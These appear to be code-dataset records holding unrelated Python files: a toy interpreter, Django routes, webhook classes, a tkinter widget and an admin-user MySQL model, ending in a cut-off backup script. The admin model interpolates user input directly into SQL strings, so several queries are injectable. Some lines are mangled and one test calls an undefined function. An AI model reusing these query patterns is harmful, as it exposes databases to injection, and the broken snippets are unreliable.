>=0:\n\t\t\texp1,exp2=self.cond[1].split(\":=\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\t\n\t\tif self.cond[1].find(\"!=\") >=0:\n\t\t\texp1,exp2=self.cond[1].split(\"!=\")\n\t\t\tself.exp1=Expression.build(exp1)\n\t\t\tself.exp2=Expression.build(exp2)\n\t\n\tdef eval(self,state):\n\t\tif self.cond[1].find(\">\") >=0:\n\t\t\treturn self.exp1.eval(state)>self.exp2.eval(state)\n\t\tif self.cond[1].find(\"<\") >=0:\n\t\t\treturn self.exp1.eval(state)=0:\n\t\t\treturn self.exp1.eval(state)==self.exp2.eval(state) \n\t\tif self.cond[1].find(\"!=\") >=0:\n\t\t\treturn self.exp1.eval(state)!=self.exp2.eval(state) \n\n\n\nclass AsgnStmt(Stmt):\n\tdef __init__(self,s):\n\t\t#print(s)\n\t\tvar,exp=s.split(\"=\")\n\t\tself.var=var.strip()\n\t\tself.exp=Expression.build(exp)\n\n\tdef eval(self,state):\n\t\tstate[self.var]=self.exp.eval(state)\n\nclass printStmt(Stmt):\n\tdef __init__(self,s):\n\t\tk=s.split()\n\t\tself.exp=Expression.build(k[1].strip(\";\"))\n\n\tdef eval(self,state):\n\t\tprint(self.exp.eval(state),end=' ')\n\nclass printlnStmt(Stmt):\n\tdef __init__(self,s):\n\t\tk=s.split()\n\t\tself.exp=Expression.build(k[1].strip(\";\"))\n\n\tdef eval(self,state):\n\t\tprint(self.exp.eval(state))\n\nclass Expression:\n\tdef build(s):\n\t\ts=s.strip()\n\t\t#print(s)\n\t\tif s.find(\"+\") >=0:\n\t\t\treturn PlusExp(s)\n\t\telif s.find(\"-\") >=0:\n\t\t\treturn SubExp(s)\n\t\telif s.find(\"*\") >=0:\n\t\t\treturn MulExp(s)\n\t\telif s.find(\"/\") >=0:\n\t\t\treturn DivExp(s)\n\t\telif s.find(\"(\")<0 & s[0].isalpha():\n\t\t\treturn VarExp(s)\n\t\telif s.find(\"\\\"\")>=0:\n\t\t\treturn StringExp(s)\n\t\telif s.find(\"(\") >=0:\n\t\t\treturn funcExp(s)\n\t\telse:\n\t\t\treturn ConstExp(s)\n\nclass funcExp(Expression):\n\tdef __init__(self, s):\n\t\tself.var= s.strip()\n\n\tdef eval(self,newstate):\n\t\t#print(state[self.var])\n\t\treturn self.var.eval(newstate)\n\nclass ConstExp(Expression):\n\tdef __init__(self,s):\n\t\tself.value=int(s)\n\n\tdef eval(self,s):\n\t\treturn self.value\n\nclass VarExp(Expression):\n\tdef __init__(self, s):\n\t\tself.var= s.strip()\n\n\tdef eval(self,state):\n\t\t#print(state[self.var])\n\t\treturn state[self.var]\n\nclass StringExp(Expression):\n\tdef __init__(self, s):\n\t\tself.var= s.strip(\"\\\"\")\n\n\tdef eval(self,state):\n\t\t#print(state[self.var])\n\t\treturn self.var\n\nclass PlusExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"+\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)+self.r.eval(state)\n\nclass SubExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"-\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)-self.r.eval(state)\n\nclass MulExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"*\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)*self.r.eval(state)\n\nclass DivExp(Expression):\n\tdef __init__(self, s):\n\t\tl,r=s.split(\"/\")\n\t\tself.l=Expression.build(l)\n\t\tself.r=Expression.build(r)\n\n\tdef eval(self,state):\n\t\treturn self.l.eval(state)/self.r.eval(state)\n\n\nif __name__=='__main__':\n\ttoycode=sys.argv[1]\n\tfile=open(toycode)\n\tcharacters=file.read()\n\tfile.close()\n\ta={}\n\ta=characters.strip().split(\"\\n\")\n\ta=list(filter(None, a))\n\t#print(a)\np=program(a)\nstate={}\np.eval(state)\n#print(state)\n\t\t\n\t\t\n\t","sub_path":"V2.py","file_name":"V2.py","file_ext":"py","file_size_in_byte":7177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"245303006","text":"from django.urls import path\n\nimport api.views.general as api\nimport web.apps.web_copo.repos.figshare as figshare\nimport web.apps.web_copo.rest.EnaRest as rest\nimport web.apps.web_copo.views as views\nimport api.annotate_views as a_views\nimport web.apps.web_copo.wizard_views as wizard\nimport submission.submissionDelegator as submit\nimport web.apps.web_copo.utils.ajax_handlers as ajax\nfrom web.apps.web_copo.rest.EnaRest import CopoChunkedUploadCompleteView, CopoChunkedUploadView\n\nimport submission.sword_utils as su\n\napp_name = 'rest'\n\nurlpatterns = [\n path('data_wiz/', wizard.data_wiz, name='data_wiz'),\n path('sample_wiz/', wizard.sample_wiz, name='sample_wiz'),\n path('receive_data_file/', rest.receive_data_file, name='receive_data_file'),\n path('receive_data_file_chunked/', CopoChunkedUploadView.as_view(), name='receive_data_file'),\n path('complete_upload/', CopoChunkedUploadCompleteView.as_view(), name='complete_data_file'),\n path('hash_upload/', rest.hash_upload, name='hash_upload'),\n path('inspect_file/', rest.inspect_file, name='inspect_file'),\n path('zip_file/', rest.zip_file, name='zip_file'),\n path('check_figshare_credentials/', figshare.check_figshare_credentials, name='check_figshare_credentials'),\n path('set_figshare_credentials/', figshare.set_figshare_credentials, name='set_figshare_credentials'),\n path('small_file_upload/', api.upload_to_figshare_profile, name='receive_data_file'),\n path('forward_to_figshare/', wizard.forward_to_figshare, name='forward_to_figshare'),\n path('get_upload_information/', ajax.get_upload_information, name='get_upload_information'),\n path('get_submission_status/', ajax.get_submission_status, name='get_submission_status'),\n path('submit_to_repo/', submit.delegate_submission, name='delegate_submission'),\n path('release_ena_study/', ajax.release_ena_study, name='release_ena_study'),\n #path('test_submission/', views.test_submission, name='test_ena_submission'),\n path('resume_chunked/', rest.resume_chunked, name='resume_chunked'),\n path('get_partial_uploads/', rest.get_partial_uploads, name='get_partial_uploads'),\n path('save_ss_annotation', a_views.save_ss_annotation, name='save_ss_annotation'),\n path('delete_ss_annotation/', a_views.delete_ss_annotation, name='delete_ss_annotation'),\n path('copo_get_submission_table_data/', views.copo_get_submission_table_data, name='get_submissions'),\n path('get_accession_data/', ajax.get_accession_data, name='get_accession_data'),\n path('set_session_variable/', ajax.set_session_variable, name='set_session_variable'),\n path('test_sword/', su.test_module, name='test_module'),\n path('call_get_dataset_details/', ajax.get_dataset_details, name='call_get_dataset_details'),\n path('samples_from_study/', ajax.get_samples_for_study, name='get_samples_for_study'),\n path('get_users/', ajax.get_users, name='get_users'),\n path('get_ontologies/', ajax.get_ontologies, name='get_ontologies'),\n path('export_generic_annotation/', ajax.export_generic_annotation, name='export_generic_annotation')\n]\n","sub_path":"web/apps/web_copo/rest_urls.py","file_name":"rest_urls.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"198613422","text":"\"\"\" Tests for reshape function in linear_modeling module\n\nRun with:\n\n nosetests test_reshape.py\n\"\"\"\n\nimport numpy as np\n\nfrom linear_modeling import reshape\n\nfrom nose.tools import assert_equal\n\nfrom numpy.testing import assert_almost_equal, assert_array_equal\n\n\n\ndef test_reshape():\n # We make a fake 4D image\n shape_3d = (2, 3, 4)\n V = np.prod(shape_3d)\n T = 10 # The number of 3D volumes\n # Make a 2D array that we will reshape to 4D\n arr_2d = np.random.normal(size=(V, T))\n differences = np.diff(arr_2d, axis=1)\n exp_rms = np.sqrt(np.mean(differences ** 2, axis=0))\n # Reshape to 4D and run function\n arr_4d = np.reshape(arr_2d, shape_3d + (T,))\n actual_rms = vol_rms_diff(arr_4d)\n assert_almost_equal(actual_rms, exp_rms)\n","sub_path":"code/utils/linear_modeling/test_reshape.py","file_name":"test_reshape.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"567826320","text":"# -*- coding: utf-8 -*-\n\"\"\"Webhook module.\"\"\"\n\n\nclass Source(object):\n def __init__(self, source):\n self.type = source['type']\n self.userId = source['userId']\n\n\nclass Message(object):\n def __init__(self, message):\n self.id = message['id']\n self.type = message['type']\n self.text = message['text']\n\n\nclass Events(Source, Message):\n def __init__(self, events):\n self.replyToken = events['replyToken']\n self.type = events['type']\n self.timestamp = events['timestamp']\n self.source = Source(events['source'])\n self.message = Message(events['message'])\n\n\nclass Postback(object):\n def __init__(self, postback):\n self.data = postback['data']\n\n\nclass ActionEvents(Postback, Source):\n def __init__(self, events):\n self.replyToken = events['replyToken']\n self.type = events['type']\n self.source = Source(events['source'])\n self.postback = Postback(events['postback'])\n\n\nclass UserProfile(object):\n def __init__(self, profile):\n self.displayName = profile['displayName']\n self.userId = profile['userId']\n self.pictureUrl = profile['pictureUrl']\n self.statusMessage = profile['statusMessage']\n","sub_path":"modules/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"379541755","text":"from sqlalchemy import Column, Boolean, Integer, Numeric, String\nfrom ..base_type import Activity, ActivityMixin\n\ndisplay_name = 'Visit'\nsidebar_icon = 'fa-globe'\n\nckwargs = dict(nullable=False, default=False, server_default='f')\nclass Visit(ActivityMixin, Activity):\n country = Column(String, info=dict(label='Country'))\n f_seminar = Column(Boolean, info=dict(\n label='Seminar presentation',\n short='Seminar'\n ), **ckwargs)\n f_worked = Column(Boolean, info=dict(\n label='Worked with faculty',\n short='Faculty'\n ), **ckwargs)\n ndays = Column(Integer, nullable=False, server_default='1', info=dict(label='# Days'))\n\n public_disclosure = True\n\n HTML_COLUMNS = [\n 'date',\n 'name',\n 'country',\n 'f_seminar',\n 'f_worked',\n 'ndays'\n ]\n\n XLSX_COLUMNS = HTML_COLUMNS + ['freetext']\n\n def __str__(self):\n return \"{} {}\".format(self.name, self.date.strftime('%Y'))\n","sub_path":"shof/activity/activities/types/visit.py","file_name":"visit.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"388683018","text":"from InstUserLabel import *\nfrom tkinter import *\n\nclass UserTable(Frame):\n def add_label(self, userLabel):\n self.users.append(userLabel)\n self.show_slaves()\n\n def add_user(self, name):\n try:\n userLabel = UserLabel(name = name, master = self)\n self.users.append(userLabel)\n self.show_slaves()\n except UsernameError:\n self.errorCount += 1\n print('Error')\n\n def __init__(self, *users, height = 400, master = None):\n self.errorCount = 0\n Frame.__init__(self, master = master, height = height, width = 440, bg = 'light blue')\n self.focus()\n self.users = []\n self.dy = 0\n self.height = height\n for user in users:\n self.add_user(user)\n\n def scroll(event):\n self.dy = self.dy -event.delta/120*20\n print(self.dy)\n self.show_slaves()\n\n def move(e):\n shift = 0\n print(e.keysym)\n if e.keysym == 'Up':\n shift = self.dy + 20\n elif e.keysym == 'Down':\n shift = self.dy - 20\n elif e.keysym == 'Home':\n shift = 0\n elif e.keysym =='End':\n shift = -self.users.__len__()*60 + self.height - 10\n elif e.keysym == 'Prior':\n shift = self.dy + self.height\n elif e.keysym == 'Next':\n shift = self.dy - self.height\n self.dy = shift\n self.dy = min(self.dy, 0)\n self.dy = max(self.dy, -self.users.__len__()*60 + self.height - 10)\n if (self.users.__len__()*60 < self.height):\n self.dy = 0\n print(self.dy)\n self.show_slaves()\n\n self.bind('', scroll)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n self.bind('', move)\n\n def show_slaves(self):\n num = 0\n for ulabel in self.users:\n num += 1\n ulabel.place(x = 20, y = (num - 1) * 60 + 10 + self.dy)\n\n def place(self, **kw):\n Frame.place(self, kw)\n self.show_slaves()\n\n def pack(self, **kw):\n Frame.pack(self, kw)\n self.show_slaves()\n\n def sort_by_rating(self):\n self.users.sort(key = lambda user: -user.rating())\n self.show_slaves()\n","sub_path":"InstRoamer/InstUserTable.py","file_name":"InstUserTable.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"625909550","text":"# -*- coding: utf-8 -*-\n\nfrom model.BaseModel import BaseModel\nfrom model.ErrorLogModel import ErrorLogModel\nimport math, time, traceback\nfrom tornado.options import define, options\n\n'''\n 管理员管理\n'''\n\nclass AdminUserModel(BaseModel):\n '''\n 根据用户名查询管理员信息\n '''\n def findAdminUserByUsername( self , username ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin` where username = '%s'\" % ( options.MYSQL_PREFIX , username )\n adminuser = model.find(cursor, sql)\n \n return adminuser\n\n '''\n 根据用户ID查询用户信息\n '''\n def findAdminUserByAdminid( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin` where id = %d\" % ( options.MYSQL_PREFIX , adminId )\n adminuser = model.find(cursor, sql)\n \n return adminuser\n\n '''\n 更新管理员信息\n '''\n def updateAdminByAdminId( self , nickname , email , error_times , status , pwd , salt , AdminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET nickname = %s , email = %s , error_times = %s , status = %s , password = %s , salt = %s WHERE id = %s\"\n try:\n cursor.execute(sql,( nickname , email , error_times , status , pwd , salt , AdminId ))\n conn.commit()\n\n return (True,None)\n except (Exception) as e:\n conn.rollback()\n errorModel = ErrorLogModel()\n errorModel.addErrorLog( 'SYS-SQL_ERROR' , \"修改管理员信息失败:\" + e.__str__() , 1 )\n\n return (False , e)\n\n '''\n 查询全部管理员\n '''\n def findAllAdminUser( self , username , nickname , mail , curpage , pagesize = 20):\n query = '1'\n if len(nickname) > 0:\n query += \" AND nickname LIKE '%%%s%%'\" % nickname\n if len(username) > 0:\n query += \" AND username LIKE '%%%s%%'\" % username\n if len(mail) > 0:\n query += \" AND email LIKE '%%%s%%'\" % mail\n\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n countsql = \"select COUNT(id) as num from `%srbac_admin` where %s\" % ( options.MYSQL_PREFIX , query )\n res = model.find(cursor, countsql)\n adminuser_count = res['num']\n page_count = math.ceil( adminuser_count / pagesize )\n curpage = min( page_count , curpage )\n sql = \"select id,nickname,username,email,status,role_id,role_str,level_str,level,name,sex,birthday from `%srbac_admin` where %s ORDER BY id ASC LIMIT %d,%d \" % ( options.MYSQL_PREFIX , query , max((curpage-1),0) * pagesize , pagesize )\n adminuser_items = model.findAll(cursor, sql)\n\n return {\n 'itemcount' : adminuser_count,\n 'pagecount' : page_count,\n 'curpage' : curpage,\n 'pagesize' : pagesize,\n 'items' : adminuser_items\n }\n\n '''\n 根据邮箱查询管理员信息\n '''\n def findAdminUserByEmail( self , email ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin` where email = '%s'\" % ( options.MYSQL_PREFIX , email )\n adminuser = model.find(cursor, sql)\n \n return adminuser\n\n '''\n 查询管理员的mac列表,新mac地址需要验证email\n '''\n def findAdminMacListByAdminId( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"select * from `%srbac_admin_mac_list` where admin_id = %d\" % ( options.MYSQL_PREFIX , adminId )\n maclist = model.findAll(cursor, sql)\n \n return maclist\n\n '''\n 更新管理员昵称/邮箱/职务/职务级别/生日/姓名/性别\n '''\n def updateAdminUserNickname( self , adminId , nickname , email , level_str , level , birthday , name , sex):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET nickname = %s , email = %s , level_str = %s , level = %s , birthday = %s , name = %s , sex = %s WHERE id = %s\"\n try:\n cursor.execute(sql,( nickname , email , level_str , level , birthday , name , sex , adminId ))\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n errorModel = ErrorLogModel()\n errorModel.addErrorLog( 'SYS-SQL_ERROR' , \"修改管理员昵称邮箱失败:\" + e.__str__() , 1 )\n\n return (False , e)\n \n '''\n 根据用户ID更新用户基础信息\n '''\n def updateAdminUserBaseInfo( self , adminId , admin ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET nickname = %s, email = %s, role_str = %s, name = %s, birthday = %s, sex = %s, level = %s, level_str = %s, address = %s, homde_address = %s, marital_status = %s, star = %s, bank_card = %s, political_status = %s, study_level = %s, study_cate = %s WHERE id = %s\"\n try:\n cursor.execute(sql,( admin['nickname'] , admin['email'] , admin['role_str'] , admin['name'] , admin['birthday'] , admin['sex'] , admin['level'] , admin['level_str'] , admin['address'] ,admin['homde_address'] ,admin['marital_status'] ,admin['star'] ,admin['bank_card'] ,admin['political_status'] ,admin['study_level'] ,admin['study_cate'] , adminId ))\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n errorModel = ErrorLogModel()\n print('修改管理员基础信息失败')\n print( e.__str__() )\n print('修改管理员基础信息失败!')\n errorModel.addErrorLog( 'SYS-SQL_ERROR' , \"修改管理员基础信息失败:\" + e.__str__() , 1 )\n\n return (False , e)\n\n '''\n 更新管理员状态\n '''\n def updateAdminUserStatus( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET status = !status WHERE id = %d\" % ( adminId )\n try:\n cursor.execute(sql)\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n \n return (False , e)\n\n '''\n 新增用户\n '''\n def addAdminUser( self , member ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin` (username,nickname,salt,status,password,error_times,email,level_str,level,birthday,name,sex) VALUES (%s,%s,%s,%s,%s,0,%s,%s,%s,%s,%s,%s)\" \n params = ( member['username'] , member['nickname'] , member['salt'] , member['status'] , member['password'] , member['email'] , member['level_str'] , member['level'] , member['birthday'] , member['name'] , member['sex'] )\n\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n \n return (False , e)\n\n '''\n 更新后台用户连续登录错误次数\n iserror 是否错误登录\n '''\n def updateAdminLoginErrorTimes( self , adminId , iserror = False ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n if iserror == True:\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET error_times = error_times + 1 WHERE id = %d\" % ( int( adminId ) )\n else :\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET error_times = 0 WHERE id = %d\" % ( int( adminId ) )\n cursor.execute(sql)\n conn.commit()\n\n return True\n\n '''\n 添加用户日志\n '''\n def addAdminLog( self , uid , log , ip , tokenstr , header ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin_log` (create_date,uid, body, ip, token_str, header) VALUES (unix_timestamp(now()),%s,%s,%s,%s,%s)\"\n params = ( uid , log , ip , tokenstr , header )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 查找管理员日志\n '''\n def findAdminLog( self , curpage , pagesize , uid = 0 , kw = '' , username = '' , nickname = ''):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n whereStr = ''\n if uid > 0:\n whereStr = \" WHERE logtable.uid = %d AND logtable.body LIKE '%%%s%%'\" % ( uid , kw )\n elif nickname != '' or username != '':\n whereStr = \" WHERE utable.username LIKE '%%%s%%' AND utable.nickname LIKE '%%%s%%' AND logtable.body LIKE '%%%s%%'\" % (username , nickname , kw)\n else:\n whereStr = \" WHERE logtable.body LIKE '%%%s%%'\" % ( kw )\n countSql = \"SELECT COUNT(*) AS num FROM `%srbac_admin_log` AS logtable LEFT JOIN `%srbac_admin` AS utable ON utable.id = logtable.uid %s\" % ( options.MYSQL_PREFIX , options.MYSQL_PREFIX , whereStr )\n _res = model.find(cursor, countSql)\n itemcount = int( _res['num'] )\n pagecount = math.ceil( itemcount / pagesize )\n sql = \"SELECT logtable.id,logtable.uid,logtable.body,logtable.ip,logtable.header,utable.nickname,utable.username,FROM_UNIXTIME(logtable.create_date,'%%Y-%%m-%%d %%H:%%i:%%S') AS logdate FROM `%srbac_admin_log` AS logtable LEFT JOIN `%srbac_admin` AS utable ON utable.id = logtable.uid %s ORDER BY logtable.id DESC LIMIT %d,%d\" % ( options.MYSQL_PREFIX , options.MYSQL_PREFIX , whereStr , (curpage - 1) * pagesize , pagesize )\n items = model.findAll( cursor , sql )\n\n return {\n 'itemcount' : itemcount,\n 'pagesize' : pagesize,\n 'pagecount' : pagecount,\n 'curpage' : curpage,\n 'items' : items\n }\n\n '''\n 删除后台用户\n '''\n def delAdminUserByAdminid( self , adminId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"DELETE FROM `\"+ options.MYSQL_PREFIX +\"rbac_admin` WHERE id = %d\" % ( adminId )\n try:\n cursor.execute(sql)\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n \n return (False , e)\n \n '''\n 更新用户权限\n '''\n def updateAdminUserRole( self , adminId , roleId , roleStr ):\n sql = \"UPDATE `\"+ options.MYSQL_PREFIX +\"rbac_admin` SET role_id = %s , role_str = %s WHERE id = %s\"\n\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n try:\n cursor.execute(sql , ( roleId , roleStr , adminId ) )\n conn.commit()\n \n return (True,None)\n except (Exception) as e:\n conn.rollback()\n print( '失败~~~' , e )\n return (False , e)\n\n '''\n 查找主题项目列表\n '''\n def findAdminThemeItem( self , themeId ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"SELECT * FROM `%srbac_admin_theme_item` WHERE tid = %d ORDER BY sort ASC\" % (options.MYSQL_PREFIX, int( themeId ) )\n items = model.findAll( cursor , sql )\n\n return items\n\n '''\n 查找用户教育信息\n '''\n def findAdminStudy( self , uid):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"SELECT * FROM `%srbac_admin_study` WHERE uid = %d ORDER BY begin_date ASC\" % (options.MYSQL_PREFIX, int( uid ) )\n items = model.findAll( cursor , sql )\n\n return items\n\n '''\n 添加教育经历\n '''\n def addAdminStudy( self , uid , school_name , major_name , cate , begin_date , end_date ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin_study` (uid, school_name, major_name, cate, begin_date, end_date) VALUES ( %s,%s,%s,%s,%s,%s )\"\n params = ( uid , school_name , major_name , cate , begin_date , end_date )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 查找用户工作信息\n '''\n def findAdminWork( self , uid):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n cursor = model.set_cursor_dict(conn, cursor)\n sql = \"SELECT * FROM `%srbac_admin_work` WHERE uid = %d ORDER BY begin_date ASC\" % (options.MYSQL_PREFIX, int( uid ) )\n items = model.findAll( cursor , sql )\n\n return items\n\n '''\n 删除工作记录\n '''\n def delAdminWork( self , cid ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"DELETE FROM `\"+ options.MYSQL_PREFIX +\"rbac_admin_work` WHERE id = %s\"\n params = ( cid )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 删除教育经历\n '''\n def delAdminStudy( self , cid ):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"DELETE FROM `\"+ options.MYSQL_PREFIX +\"rbac_admin_study` WHERE id = %s\"\n params = ( cid )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n '''\n 添加工作经历\n '''\n def addAdminWork( self, uid, company, station_name, begin_date, end_date):\n model = super(AdminUserModel, self)\n MYSQL_DATABASE_NAME = options.MYSQL_DATABASE_NAME\n conn, cursor = model.get_conn_cursor(MYSQL_DATABASE_NAME)\n sql = \"INSERT INTO `\"+ options.MYSQL_PREFIX +\"rbac_admin_work` (uid, company, station_name, begin_date, end_date) VALUES ( %s,%s,%s,%s,%s )\"\n params = ( uid, company, station_name, begin_date, end_date )\n try:\n cursor.execute(sql , params)\n conn.commit()\n \n return (True,None)\n except (Exception) as e: \n conn.rollback()\n return (False , e)\n\n def findAdminUnreadMsg( self ):\n\n pass\n\n def findNotice( self ):\n\n pass\n\n def findImgAdr( self ):\n\n pass","sub_path":"pyapi/model/AdminUserModel.py","file_name":"AdminUserModel.py","file_ext":"py","file_size_in_byte":17417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"621596321","text":"# -*- coding: utf-8 -*-\nimport os\n\n\ndef get_files(dir, ext='csv'):\n for root, dirs, files in os.walk(dir):\n\n if len(files) == 0:\n print(\"no files found in {}\".format(dir))\n\n for file in files:\n if file.endswith(ext):\n yield os.path.join(root, file)\n","sub_path":"loader/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"119212967","text":"#!/usr/bin/env python\nfrom __future__ import print_function # emulates python3-esque\n# (and like every other freaking programming language that somewhat\n# resembles C) printing\n\n\"\"\"\nThis script will create a backup using rsync and a set of\ndirectories + configuration file built by the setup.py script in this\ndirectory\n\"\"\"\n# Copyright (C) 2015 by\n# Colin Dablain \n# All rights reserved.\n# Licensed under GNU GPL v3; see license.txt\n\nimport readwrite\nimport os\n\ndef get_path(custom_message=False):\n\twhile True:\n\t\tpath = \"\"\n\t\tif (custom_message):\n\t\t\tpath = raw_input(custom_message)\n\t\telse:\n\t\t\tpath = raw_input(\"Enter a path: \")\n\t\ttry: # check if specified path exists\n\t\t\tos.chdir(path)\n\t\t\tprint(\"That path resolves to \\\"%s\\\"\" % path)\n\t\t\tcheck = raw_input(\"Is this correct?(y/n): \")\n\t\t\tif (check == 'y'): # if the path is correct\n\t\t\t\treturn path\n\t\t\telse: # if it isn't \n\t\t\t\tprint(\"\\nTry adding a / to the beginning of your \"\n\t\t\t\t \"path\\n\\n\")\n\t\texcept OSError: # if the system determiens the path 